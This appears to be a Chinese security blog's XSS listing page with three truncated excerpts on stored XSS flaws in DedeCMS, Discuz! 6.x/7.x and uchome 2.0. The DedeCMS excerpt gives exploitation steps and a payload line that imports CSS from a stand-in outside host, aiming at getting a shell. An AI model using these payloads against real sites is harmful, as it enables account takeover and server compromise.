XSS

不再关注网络安全

DEDECMS XSS GETSHeLL 通杀所有版本

利用条件:开启注册&&开启投稿 方法 :注册会员 -> 发表文章:内容输入 @import´http://xxx.com/xss.css´; xss.css内容: body{background-...

Discuz!多版本,存储型XSS脚本漏洞(0day)

发布时间:2011-06-23 影响版本: Discuz! Discuz! 7.x Discuz! Discuz! 6.x 漏洞描述: Discuz论坛软件系统亦称电子公告板(BBS)系统,它伴随社区BBS的流行而...

uchome 2.0 存在持久XSS漏洞

发布时间:2010-09-03 影响版本:uchome 2.0 漏洞描述:看源码分析的,出错位置较敏感,而且基本没有利用限制,个人主页自定义风格时,可@import外部css文件 ...